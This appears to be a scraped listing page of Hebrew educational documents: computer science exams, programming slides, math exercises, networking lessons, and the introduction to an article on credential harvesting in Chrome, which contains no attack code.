People. Partnership. Trust מסלול Free פורטל החינוך מבית U-BTech מסלולים ומחירים חיבור לשירותי Office 365 ללא עלות פורטל התחברות הכולל ממשק למנבס ולסי מסלול Free פורטל החינוך מבית U-BTech מסלולים ומחירים חיבור לשירותי Office 365 ללא עלות פורטל התחברות הכולל ממשק למנב"ס ולסיסמא אחודה דף בית לתלמיד המאפשר גישה פשוטה להורדת הטבת האופיס מסלול Basic הפלטפורמה

קרא עוד

הנחיות הורדה ותפעול לספרים דיגיטלים. הוצאת כנרת, זמורה ביתן שמחה להגיש לכם, התלמידים, ספר דיגיטלי. הספרים עצמם הינם בקבצי PDF הניתנים להורדה ללא עלות

הנחיות הורדה ותפעול לספרים דיגיטלים. הוצאת כנרת, זמורה ביתן שמחה להגיש לכם, התלמידים, ספר דיגיטלי. הספרים עצמם הינם בקבצי PDF הניתנים להורדה ללא עלות הנחיות הורדה ותפעול לספרים דיגיטלים. הוצאת כנרת, זמורה ביתן שמחה להגיש לכם, התלמידים, ספר דיגיטלי. הספרים עצמם הינם בקבצי PDF הניתנים להורדה ללא עלות וללא צורך ברישום לאתר למשתמשי סדרת פשוט חשבון. בספרים:

קרא עוד

Python 2.7 in Hebrew

Python 2.7 in Hebrew Python גרסה 7.2 זהר זילברמן גרסה 1.71 אין לשכפל, להעתיק, לצלם, להקליט, לתרגם, לאחסן במאגר מידע, לשדר או לקלוט בכל דרך או אמצעי אלקטרוני, אופטי או מכני או אחר כל חלק שהוא מהחומר שבספר זה. שימוש מסחרי מכל

קרא עוד

Slide 1

Slide 1 1 אובייקטים היום בתרגול: 2.)objects מחלקות )classes( ואובייקטים )מופעים, )fields( שדות המחלקה שיטות הכמסה )methods של מחלקה. ( class מחלקה - עד עכשיו השתמשנו בעיקר בטיפוסים מובנים ופונקציות המבצעות חישובים

קרא עוד

ex1-bash

ex1-bash ביה"ס למדעי המחשב סמסטר חורף תשע"ח 13.12.2017 יסודות מערכות פתוחות פתרון תרגיל מס' 7 המכללה האקדמית נתניה שימו לב: כל ההערות שבתחילת תרגילים 1-6 תקפות גם לתרגיל זה. הערה 1: החל מתרגיל זה והלאה, בכל פעם

קרא עוד

מקביליות

מקביליות PROMELA גרא וייס המחלקה למדעי המחשב אוניברסיטת בן-גוריון עדכון אחרון: 21:40 15/06/2013 2 שפת מ פ ר ט עם ס מ נ ט יק ה מוגדרת באופן מתמטי "שפת תכנות" למודלים המטרה: לאפשר גם לכאלה שאינם חוקרים בתחום לבנות

קרא עוד

אוניברסיטת בן גוריון בנגב תאריך המבחן: שם המרצה: מר אלכסנדר שקולניק, בשפת JAVA מבחן ב: מבוא לתכנות מס' הקורס : מיועד לתלמידי : הנד

אוניברסיטת בן גוריון בנגב תאריך המבחן: שם המרצה: מר אלכסנדר שקולניק, בשפת JAVA מבחן ב: מבוא לתכנות מס' הקורס : מיועד לתלמידי : הנד אוניברסיטת בן גוריון בנגב תאריך המבחן: 29.01.19 שם המרצה: מר אלכסנדר שקולניק, בשפת JAVA מבחן ב: מבוא לתכנות 202.1.9031 מס' הקורס : מיועד לתלמידי : הנדסת תעשיה וניהול שנה תשע"ט א' סמ' א' מועד 3 שעות משך

קרא עוד

Microsoft Word - c_SimA_MoedB2005.doc

Microsoft Word - c_SimA_MoedB2005.doc מרצה: שולי וינטנר. מתרגל: עזרא דאיה. מבוא למדעי המחשב בחינת מועד ב', סמסטר א' תשס"ה,.2.2005 משך המבחן: שעתיים וחצי. חומר עזר: מותר כל חומר עזר, מלבד מחשב. הנחיות:. ודאו כי בטופס שבידיכם עמודים. יש לכתוב

קרא עוד

PowerPoint Presentation

PowerPoint Presentation מבוא למדעי המחשב תירגול 2: מבוא לתיכנות ב- C 1 תוכנייה משתנים קלט/פלט משפטי תנאי מבוא למדעי המחשב מ' - תירגול 3 2 משתנים 3 משתנים- תמונת הזיכרון הזיכרון כתובת התא #1000 10-4 לא מאותחל 67 לכל תא בזיכרון

קרא עוד

ייבוא וייצוא של קבצי אקסל וטקסט

ייבוא וייצוא של קבצי אקסל וטקסט ייבוא וייצוא של קבצי אקסל וטקסט (Importing & Exporting MS Excel Files and Text) ייבוא (Import) הפיכת קובץ טקסט, Excel מבסיס נתונים אחר. או סוגים אחרים, לטבלת,Access או העתקת טבלת Access בתחילת התהליך יש

קרא עוד

מבוא לאסמבלי

מבוא לאסמבלי 1 ברק גונן תוכנית שבנויה מחלקי קוד נפרדים המשולבים זה בזה מאפיינים: נקודת כניסה אחת נקודת יציאה אחת מבצעים פעולה מוגדרת נקראים פרוצדורות ברק גונן 2 קוד קצר יותר לא צריך לחזור על חלקי קוד שאלה למחשבה: האם

קרא עוד

2019 שאלות מומלצות לתרגול מס' דיפרנציאביליות של פונקציה סקלרית )המשך(. כלל השרשרת. S = ( x, y, z) z = x + 3y על המשטח מצאו נקודה בה מישור משיק

2019 שאלות מומלצות לתרגול מס' דיפרנציאביליות של פונקציה סקלרית )המשך(. כלל השרשרת. S = ( x, y, z) z = x + 3y על המשטח מצאו נקודה בה מישור משיק דיפרנציאביליות של פונקציה סקלרית )המשך( כלל השרשרת S ( z) z + על המשטח מצאו נקודה בה מישור משיק מקביל : f ( ) + הפונקציה מוגדרת וגזירה ברציפות בכל M( ) שאלה נתון פרבולואיד אליפטי P ( z) + 6 + z + 8 למישור

קרא עוד

עבודה במתמטיקה לכיתה י' 5 יח"ל פסח תשע"ה אפריל 5105 קשה בלימודים, קל במבחנים, קל בחיים עבודה במתמטיקה לכיתה י' 5 יח"ל פסח תשע"ה יש לפתור את כל השאלות

עבודה במתמטיקה לכיתה י' 5 יחל פסח תשעה אפריל 5105 קשה בלימודים, קל במבחנים, קל בחיים עבודה במתמטיקה לכיתה י' 5 יחל פסח תשעה יש לפתור את כל השאלות עבודה במתמטיקה לכיתה י' 5 יח"ל פסח תשע"ה יש לפתור את כל השאלות על דפים משובצים. רשמו את שמכם על כל אחד מהדפים הפתרונות יוגשו אחרי חופשת הפסח. מומלץ לכתוב דואר אלקטרוני, Whatspp כאשר נתקלים בקושי. מישהו

קרא עוד

תוכן העניינים: פרק צמצומים ומימושים של פונקציות בוליאניות... 2 צמצומים של פונקציות באמצעות מפת קרנו:...2 שאלות:... 2 תשובות סופיות:... 4 צמצום

תוכן העניינים: פרק צמצומים ומימושים של פונקציות בוליאניות... 2 צמצומים של פונקציות באמצעות מפת קרנו:...2 שאלות:... 2 תשובות סופיות:... 4 צמצום תוכן העניינים: פרק 2 3 צמצומים ומימושים של פונקציות בוליאניות 2 צמצומים של פונקציות באמצעות מפת קרנו: 2 שאלות: 2 תשובות סופיות: 4 צמצום באמצעות שיטת 6:QM שאלות: 6 תשובות סופיות: 7 מימושים בעזרת פונקציות

קרא עוד

HTML - Hipper Text Makeup Language

HTML - Hipper Text Makeup Language תכנות בסביבת האינטרנט 1 תיבת טקסט טופס הטופס הוא הדרך של בעלי האתר לקבל משוב מהגולשים, מאפשר לגולש להתחבר לאתר כחבר, מאפשר לבצע רכישות באתרי קניות וכד'. כשהגולש ממלא את הטופס, מועבר תוכן הטופס לדף מיוחד

קרא עוד

אוניברסיטת חיפה החוג למדעי המחשב מבוא למדעי המחשב מועד א' סמסטר ב', תשע"ג, משך המבחן: שעתיים וחצי חומר עזר: אסור הנחיות: וודאו כי יש בידיכם

אוניברסיטת חיפה החוג למדעי המחשב מבוא למדעי המחשב מועד א' סמסטר ב', תשעג, משך המבחן: שעתיים וחצי חומר עזר: אסור הנחיות: וודאו כי יש בידיכם אוניברסיטת חיפה החוג למדעי המחשב מבוא למדעי המחשב מועד א' סמסטר ב', תשע"ג,.6.013 משך המבחן: שעתיים וחצי חומר עזר: אסור הנחיות: וודאו כי יש בידיכם 8 עמודי שאלון )כולל עמוד זה(. עליכם לכתוב את התשובות על

קרא עוד

Microsoft PowerPoint - T-10.ppt [Compatibility Mode]

Microsoft PowerPoint - T-10.ppt [Compatibility Mode] מבוא למחשב בשפת Matlab לולאות בלוקי try-catch :10 תרגול מבוסס על השקפים שחוברו ע"י שי ארצי, גיתית רוקשטיין, איתן אביאור, סאהר אסמיר וטל כהן עבור הקורס "מבוא למדעי המחשב" נכתב על-ידי רמי כהן,אולג רוכלנקו,

קרא עוד

מבוא למדעי המחשב

מבוא למדעי המחשב מבוא למדעי המחשב המחלקה Object תוכן עניינים Object הורשה והמחלקה ערך שם טיפוס DynamicIntArray da data size incrementsize DynamicArray תזכורת - Object[] data; int size; int incrementsize; DynamicArray זה

קרא עוד

פרויקט שורשים דמות

פרויקט שורשים דמות פרויקט שורשים דמות בחייכם אודות דמות פרק זה בעבודת השורשים יכלול מידע אודות הדמות שנבחרה מצד ההורים. הפרק יכיל תקציר רגיל ]רשות[ או מעוצב ]רשות[, טקסט ]חובה[, תמונות ]רשות אבל ]רשות [. רצוי מאוד[, אלבום-מצגת

קרא עוד

שיעור 07

שיעור 07 נושא הלימוד: ACL (Access Control List) מרצה:אלי בפלר Version 2 כל הזכויות שמורות לאלי beflereli@gmail.com בפלר 1 תודה ליקי בן ניסן על תרומת חלק נרחב מחומר הלימוד מבוא לצורךאבטחתהרשתברורשישצורךב- Firewall

קרא עוד

People. Partnership. Trust שלבי הפרויקט והמסלולים השונים - פלטפורמת "קהילה לומדת" מסלול Free שלבי הפרויקט: חיבור לשירותי Office 365 ללא עלות פורטל התח

People. Partnership. Trust שלבי הפרויקט והמסלולים השונים - פלטפורמת קהילה לומדת מסלול Free שלבי הפרויקט: חיבור לשירותי Office 365 ללא עלות פורטל התח שלבי הפרויקט והמסלולים השונים - פלטפורמת "קהילה לומדת" מסלול Free שלבי הפרויקט: חיבור לשירותי Office 365 ללא עלות פורטל התחברות הכולל ממשק למנב"ס ולסיסמא אחודה דף בית לתלמיד המאפשר גישה פשוטה להורדת הטבת

קרא עוד

שאלהIgal : מערכים דו מימדיים רקורסיה:

שאלהIgal : מערכים דו מימדיים רקורסיה: אוניברסיטת בן גוריון בנגב מספר נבחן : תאריך המבחן: כ"ח תשרי תשע"ז 30.10.16 שמות המורים: ציון סיקסיק א' תכנות ב- C מבחן ב: 202-1-9011 מס' הקורס : הנדסה מיועד לתלמידי : ב' מועד סמ' קיץ שנה תשע"ו 3 שעות משך

קרא עוד

Credentials Harvesting via Chrome מאת דניאל לוי הקדמה הדפדפן השכיח ביותר כיום הינו Chrome של חברת גוגל )מקור(. החלטתי לחקור את הדפדפן, בעיקר את הפרוטו

Credentials Harvesting via Chrome מאת דניאל לוי הקדמה הדפדפן השכיח ביותר כיום הינו Chrome של חברת גוגל )מקור(. החלטתי לחקור את הדפדפן, בעיקר את הפרוטו מאת דניאל לוי הקדמה הדפדפן השכיח ביותר כיום הינו Chrome של חברת גוגל )מקור(. החלטתי לחקור את הדפדפן, בעיקר את הפרוטוקולים שהוא עושה בהם שימוש, פיצ'רים ייחודיים ועוד. המחקר בוצע על גבי סביבת "Windows" בגרסה

קרא עוד

מבוא למדעי המחשב - חובלים

מבוא למדעי המחשב - חובלים אוניברסיטת חיפה החוג למדעי המחשב מבוא למדעי המחשב סמסטר ב' תשע"ב בחינת סיום, מועד ב',.02..9.7 מרצה: אורן וימן מתרגלים: נעמה טוויטו ועדו ניסנבוים מדריכי מעבדה: מחמוד שריף ומיקה עמית משך המבחן: שעתיים חומר

קרא עוד

הסבר על Firewall והתקנת pfsense,הגדרת תעודת אבטחה ב VestaCP בחינם

הסבר על Firewall והתקנת pfsense,הגדרת תעודת אבטחה ב VestaCP בחינם הסבר על Firewall והתקנת pfsense כל הזכויות שמורות לטל בן שושן Shushan.co.il הסבר על Firewall והתקנת pfsense ניתן לקרוא על FW של צ ק פוינט מדיע נוסף במאמר : הסבר על CheckPoint GAiA R77.30 pfsense pfsense

קרא עוד

מס' ת"ז מס' מחברת מבחן בקורס מבוא מורחב למדעי המחשב CS1001.py ביה"ס למדעי המחשב, אונ' תל אביב סמסטר א' , מועד ב, 23/3/2018 מרצים: דניאל דויטש,

מס' תז מס' מחברת מבחן בקורס מבוא מורחב למדעי המחשב CS1001.py ביהס למדעי המחשב, אונ' תל אביב סמסטר א' , מועד ב, 23/3/2018 מרצים: דניאל דויטש, מבחן בקורס מבוא מורחב למדעי המחשב CS1001.py ביה"ס למדעי המחשב, אונ' תל אביב סמסטר א' 2017-18, מועד ב, 23/3/2018 מרצים: דניאל דויטש, אמיר רובינשטיין מתרגלים: מיכל קליינבורט, אמיר גלעד משך הבחינה: 3 שעות.

קרא עוד

אוניברסיטת תל אביב - בית הספר למדעי המחשב מבוא מורחב למדעי המחשב, אביב 2019 תרגיל בית מספר - 2 להגשה עד 02/04/2019 בשעה 23:55 קיראו בעיון את הנחיות הע

אוניברסיטת תל אביב - בית הספר למדעי המחשב מבוא מורחב למדעי המחשב, אביב 2019 תרגיל בית מספר - 2 להגשה עד 02/04/2019 בשעה 23:55 קיראו בעיון את הנחיות הע תרגיל בית מספר - 2 להגשה עד 02/04/2019 בשעה 23:55 קיראו בעיון את הנחיות העבודה וההגשה המופיעות באתר הקורס, תחת התיקייה.assignments חריגה מההנחיות תגרור ירידת ציון / פסילת התרגיל. הגשה: תשובותיכם יוגשו

קרא עוד

פייתון

פייתון שיעור 12: מילונים ברק גונן 1 או מילון, :hash table או,dictionary זוגות של מפתחות keys וערכים values מילון מוגדר על ידי סוגריים מסולסלים { } לדוגמה: מילון שמכיל ציונים, המפתח הוא מספר ת.ז ערך מפתח הגדרה

קרא עוד

Slide 1

Slide 1 בעיית התוכנית הגדולה C תוכנית גדולה המבצעת פעולות רבות, יכולה להפוך לקשה מאוד לניהול אם נשתמש רק בכלים שלמדנו עד כה: 1. קשה לכתוב ולנפות את התוכנית,. קשה להבין אותה, 3. קשה לתחזק ולתקן אותה, 4. קשה להוסיף

קרא עוד

תרגול מס' 1

תרגול מס' 1 תרגול 6 הסתעפויות 1 מבוסס על שקפים מאת יאן ציטרין קפיצות לא מותנות Unconditional Branch br label PC לאחר ה- fetch של פקודת ה- branch PC לאחר הביצוע של פקודת ה- branch pc label br label הקפיצה מתבצעת תמיד,

קרא עוד

מבחן סוף סמסטר מועד ב 28/10/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, גדי אלכסנדרוביץ הוראות: א. בטופס המבחן 6 עמודים (כולל דף זה) ו

מבחן סוף סמסטר מועד ב 28/10/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, גדי אלכסנדרוביץ הוראות: א. בטופס המבחן 6 עמודים (כולל דף זה) ו מבחן סוף סמסטר מועד ב 28/10/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, גדי אלכסנדרוביץ הוראות: א. בטופס המבחן 6 עמודים (כולל דף זה) ו 4 דפי נוסחאות. בדקו שכל העמודים ברשותכם. ב. משך המבחן

קרא עוד

תוכן העניינים

תוכן העניינים הוצאת חושבים קדימה הילה קדמן חלק ב יעוץ מקצועי: חיים אברבוך מותאם לתכנית הלימודים החדשה בבתי הספר התיכוניים מהדורה חמישית הוצאת חושבים קדימה ת.ד. 1293 רעות 71908 www.kadman.net הילה קדמן 0522 525527 kadman11@gmail.com

קרא עוד

שיעור מס' 6 – סבולות ואפיצויות

שיעור מס' 6 – סבולות ואפיצויות שיעור מס' 6 סבולות ואפיצויות Tolerances & Fits Tolerances חלק א' - סבולות: כידוע, אין מידות בדיוק מוחלט. כאשר אנו נותנים ליצרן חלק לייצר ונותנים לו מידה כלשהי עלינו להוסיף את תחום הטעות המותרת לכל מידה

קרא עוד

מבוא למדעי המחשב - חובלים

מבוא למדעי המחשב - חובלים החוג למדעי המחשב אוניברסיטת חיפה מבוא למדעי המחשב סמסטר א' תשע"ג בחינת סיום, מועד ב', 20.02.2013 מרצה: ריטה אוסדצ'י מתרגלת: נעמה טוויטו מדריך מעבדה: מחמוד שריף משך המבחן: שעתיים חומר עזר: ספר של Kernighan

קרא עוד

Microsoft Word - Sol_Moedb10-1-2,4

Microsoft Word - Sol_Moedb10-1-2,4 הפקולטה למתמטיקה - הטכניון חיפה מד''ח - 48 חורף תשע''א - בחינה סופית מועד ב' שאלה : תהי נתונה המד"ח הבאה: u + uu = y א. מצא את העקומים האופייניים של משוואה זו בצורה פרמטרית. ב. פתור את המד"ח הנתונה לעיל

קרא עוד

Microsoft Word - Document1

Microsoft Word - Document1 2.2 עקרונות עבודה ברמה שניה 2 Layer כאשר אנו מתעסקים כיום ברשתות תקשורת מקומיות אנו רואים נטייה לצמיחה וגידול כמות המשתמשים ברשת. כאשר מדובר למשל בחברה קטנה בה כל התחנות מקושרות לרשת מסוג SHARED MEDIA

קרא עוד

תורת החישוביות תרגול הכנה לוגיקה ותורת הקבוצות מה יש כאן? בקורס תורת החישוביות נניח ידע בסיסי בתורת הקבוצות ובלוגיקה, והכרות עם מושגים בסיסיים כמו א"ב

תורת החישוביות תרגול הכנה לוגיקה ותורת הקבוצות מה יש כאן? בקורס תורת החישוביות נניח ידע בסיסי בתורת הקבוצות ובלוגיקה, והכרות עם מושגים בסיסיים כמו אב תורת החישוביות תרגול הכנה לוגיקה ותורת הקבוצות מה יש כאן? בקורס תורת החישוביות נניח ידע בסיסי בתורת הקבוצות ובלוגיקה, והכרות עם מושגים בסיסיים כמו א"ב, מילה ושפה לטובת מי ששכח חומר זה, או שלא למדו מעולם,

קרא עוד

מדריך למרצים ומתרגלים 1

מדריך למרצים ומתרגלים 1 מדריך למרצים ומתרגלים 1 תוכן עניינים מדריך למרצים ומתרגלים...1 קבלת סיסמה לתחנת מידע למרצה...3 הוספת חומרי למידה...6 הוספת מורשה גישה לאתר הוספת מטלה קורס...9 לאתר הקורס...11 בחירת בודקים למטלה...17 מערכת

קרא עוד

תשע"דד אביב תוכנה 1 תרגיל מספר 4 עיבוד מחרוזות וקריאה מקבצים הנחיות כלליות: קראו בעיון את קובץ נהלי הגשת התרגילים אשר נמצא באתר הקורס..(

תשעדד אביב תוכנה 1 תרגיל מספר 4 עיבוד מחרוזות וקריאה מקבצים הנחיות כלליות: קראו בעיון את קובץ נהלי הגשת התרגילים אשר נמצא באתר הקורס..( תשע"דד אביב תוכנה 1 תרגיל מספר 4 עיבוד מחרוזות וקריאה מקבצים הנחיות כלליות: קראו בעיון את קובץ נהלי הגשת התרגילים אשר נמצא באתר הקורס..(http://mdle.tau.ac.il/) בלבד הגשת התרגיל תעשה במערכת ה- mdle aviv

קרא עוד

Microsoft Word - c_SimA_MoedA2006.doc

Microsoft Word - c_SimA_MoedA2006.doc מבוא למדעי המחשב בחינת מועד א', סמסטר א' תשס"ו,..006 מרצה: מתרגלת: גב' יעל כהן-סיגל. גב' ליאת לוונטל. משך המבחן: שעתיים וחצי. חומר עזר: מותר כל חומר עזר, מלבד מחשב. הנחיות:. יש לענות על כל השאלות.. קראו

קרא עוד

שקופית 1

שקופית 1 www.pwc.com/il חידושים בתחום התמריצים טלי ברנד, רו"ח, דירקטורית, מנהלת מחלקת תמריצים, אוקטובר 2014 תוכן העניינים דגשים לגבי הטבות מס על פי החוק לעידוד השקעות הון תכניות מענקי מחקר ופיתוח נבחרות שינויים

קרא עוד

<4D F736F F D20F4FAF8E5EF20EEE5F2E320E020F1EEF1E8F820E120FAF9F2E3>

<4D F736F F D20F4FAF8E5EF20EEE5F2E320E020F1EEF1E8F820E120FAF9F2E3> האקדמית תל אביב-יפו מבוא ללוגיקה ותורת הקבוצות מועד א' סמסטר ב' תשע"ד הפתרון לא נכתב על ידי גורם רשמי ובהחלט יכול להיות שנפלו טעויות פה ושם עשיתי כמיטב יכולתי אבל תשימו לב ותפעילו שיקול דעת אשמח לשמוע

קרא עוד